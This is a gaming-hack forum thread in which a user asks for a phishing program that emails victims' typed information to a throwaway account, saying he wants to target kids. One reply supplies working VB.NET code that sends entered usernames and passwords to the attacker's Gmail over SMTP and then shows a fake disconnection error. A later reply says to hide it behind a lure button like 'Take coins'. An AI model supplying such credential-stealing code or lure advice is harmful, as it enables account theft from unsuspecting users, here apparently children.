Results 1 to 12 of 12
  1. #1
    Durdan's Avatar
    Join Date
    Jan 2014
    Gender
    male
    Posts
    497
    Reputation
    72
    Thanks
    143

    Phishing Program

    I just want a simple tutorial with very smalls steps to achieve a phishing program. To steal information that someone puts in and it sends all the information to an expendable email.

  2. #2
    gtaplayer2's Avatar
    Join Date
    Aug 2013
    Gender
    male
    Location
    Dancing with my kawaii friend
    Posts
    588
    Reputation
    22
    Thanks
    1,984
    First off I'm pretty sure that this breaks rules of MPGH. Secondly if you really want to do it, just google it or search on youtube. You'll get more results from there.

  3. #3
    Durdan's Avatar
    Join Date
    Jan 2014
    Gender
    male
    Posts
    497
    Reputation
    72
    Thanks
    143
    Quote Originally Posted by gtaplayer2 View Post
    First off I'm pretty sure that this breaks rules of MPGH. Secondly if you really want to do it, just google it or search on youtube. You'll get more results from there.
    This is a hacking site where we make programs and help others to make programs that can do many things, if you are a hacker then you should know that this a complete scam and I only want to troll some kids.

    Also, I have checked youtube, google, even this site but I couldn't find anything, I'm either to lazy or there really isn't something here.
    The only thing I'm asking for is lines of code that send small kinds of information to an expendable email which I have already set up.

  4. #4
    georgelabra's Avatar
    Join Date
    Apr 2013
    Gender
    male
    Location
    Greece
    Posts
    111
    Reputation
    10
    Thanks
    26
    My Mood
    Aggressive
    Code:
    Imports System.Net.Mail
    
    If TextBox1.Text = "" Then
    MsgBox("Username Is Missing")
    If Textbox2.text = "" Then
    Msgbox("Password Is Mising")
    Else
    End If
    End if
    Dim smtpServer As New SmtpClient()
    Dim mail As New MailMessage()
    smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
    'using gmail
    smtpServer.Port = 587
    smtpServer.Host = "smtp.gmail.com"
    smtpServer.EnableSsl = True
    mail = New MailMessage()
    mail.From = New MailAddress("Your Gmail")
    mail.To.Add("Your Gmail")
    mail.Subject = "Username: " & TextBox1.Text
    mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
    smtpServer.Send(mail)
    MsgBox("DIsconnected From Server, Please try again later!")
    Hopefully this is what you are asking for.

  5. #5
    Durdan's Avatar
    Join Date
    Jan 2014
    Gender
    male
    Posts
    497
    Reputation
    72
    Thanks
    143
    Quote Originally Posted by georgelabra View Post
    Code:
    Imports System.Net.Mail
    
    If TextBox1.Text = "" Then
    MsgBox("Username Is Missing")
    If Textbox2.text = "" Then
    Msgbox("Password Is Mising")
    Else
    End If
    End if
    Dim smtpServer As New SmtpClient()
    Dim mail As New MailMessage()
    smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
    'using gmail
    smtpServer.Port = 587
    smtpServer.Host = "smtp.gmail.com"
    smtpServer.EnableSsl = True
    mail = New MailMessage()
    mail.From = New MailAddress("Your Gmail")
    mail.To.Add("Your Gmail")
    mail.Subject = "Username: " & TextBox1.Text
    mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
    smtpServer.Send(mail)
    MsgBox("DIsconnected From Server, Please try again later!")
    Hopefully this is what you are asking for.
    I have the code, now where do I put it. I have a 1 progress bar, 3 Radio buttons, 1 button, 4 labels, 2 text boxes for their information to be typed in. That's all I want, their information that the have typed in the two boxes

  6. #6
    Durdan's Avatar
    Join Date
    Jan 2014
    Gender
    male
    Posts
    497
    Reputation
    72
    Thanks
    143
    Also this is the current code I have:

    using System;
    using System.Collections.Generic;
    using System.ComponentModel;
    using System.Data;
    using System.Drawing;
    using System.Linq;
    using System.Text;
    using System.Threading.Tasks;
    using System.Windows.Forms;

    namespace WindowsFormsApplication2
    {
    public partial class Form1 : Form
    {
    public Form1()
    {
    InitializeComponent();
    }

    private void Form1_Load(object sender, EventArgs e)
    {

    }

    private void button1_Click(object sender, EventArgs e)
    {

    }
    }
    }

  7. #7
    georgelabra's Avatar
    Join Date
    Apr 2013
    Gender
    male
    Location
    Greece
    Posts
    111
    Reputation
    10
    Thanks
    26
    My Mood
    Aggressive
    Just put the code in a button that says " Take coins" or something idk what u're making. But change the code and put your gmail in it.

  8. #8
    GryffindorHD's Avatar
    Join Date
    Apr 2014
    Gender
    male
    Posts
    8
    Reputation
    10
    Thanks
    0
    Its illegal to do that bro!! and becareful when doing it!!

  9. #9
    Smileyblaster's Avatar
    Join Date
    Jul 2012
    Gender
    male
    Posts
    241
    Reputation
    10
    Thanks
    232
    My Mood
    Amused
    @Durdan One if you're looking for an application then it would be called a RAT. Remote Administative Tool. Secondly anybody who downloads these things just decompiles em to get access to the email. Thirdly if you're looking for a website tool (Phishing). It got that nickname because anybody in their right mind doesn't give out their info on the internet. Good luck cause those are programmed in 2 different languages, html and php. Both semi-hard languages to learn.

  10. The Following User Says Thank You to Smileyblaster For This Useful Post:

    Durdan (08-04-2014)

  11. #10
    Durdan's Avatar
    Join Date
    Jan 2014
    Gender
    male
    Posts
    497
    Reputation
    72
    Thanks
    143
    Quote Originally Posted by Smileyblaster View Post
    @Durdan One if you're looking for an application then it would be called a RAT. Remote Administative Tool. Secondly anybody who downloads these things just decompiles em to get access to the email. Thirdly if you're looking for a website tool (Phishing). It got that nickname because anybody in their right mind doesn't give out their info on the internet. Good luck cause those are programmed in 2 different languages, html and php. Both semi-hard languages to learn.
    I understand but the only thing I would say against this is that I have an expendable email. Thanks for telling me this. I might as well just give this up. I don't have that much time on my hands

  12. #11
    pleasereturnmythong's Avatar
    Join Date
    Jul 2014
    Gender
    male
    Posts
    45
    Reputation
    52
    Thanks
    9
    Quote Originally Posted by Durdan View Post
    Also this is the current code I have:

    using System;
    using System.Collections.Generic;
    using System.ComponentModel;
    using System.Data;
    using System.Drawing;
    using System.Linq;
    using System.Text;
    using System.Threading.Tasks;
    using System.Windows.Forms;

    namespace WindowsFormsApplication2
    {
    public partial class Form1 : Form
    {
    public Form1()
    {
    InitializeComponent();
    }

    private void Form1_Load(object sender, EventArgs e)
    {

    }

    private void button1_Click(object sender, EventArgs e)
    {

    }
    }
    }
    serisouly can't you use [code] [/code ] ?

  13. #12
    Durdan's Avatar
    Join Date
    Jan 2014
    Gender
    male
    Posts
    497
    Reputation
    72
    Thanks
    143
    Quote Originally Posted by pleasereturnmythong View Post
    serisouly can't you use [code] [/code ] ?
    Fite me at pax (╯°□°)╯︵ ┻━┻

    Forgot about that feature.

Similar Threads

  1. [Discussion] Phishing program..
    By Mercenario$$ in forum CrossFire Discussions
    Replies: 11
    Last Post: 08-29-2011, 04:13 PM
  2. I wont make any phishing programs again! Read This....
    By zayat123 in forum CrossFire Discussions
    Replies: 72
    Last Post: 08-27-2011, 11:55 AM
  3. how do i make a phishing program?
    By svizy in forum Programming Tutorial Requests
    Replies: 12
    Last Post: 08-11-2011, 03:59 PM
  4. Need help with visual basic PHISHING program
    By mariofan901 in forum Visual Basic Programming
    Replies: 14
    Last Post: 10-10-2009, 11:27 AM
  5. Problem Wit Hacking Programs
    By f5awp in forum General Gaming
    Replies: 5
    Last Post: 01-10-2006, 05:44 AM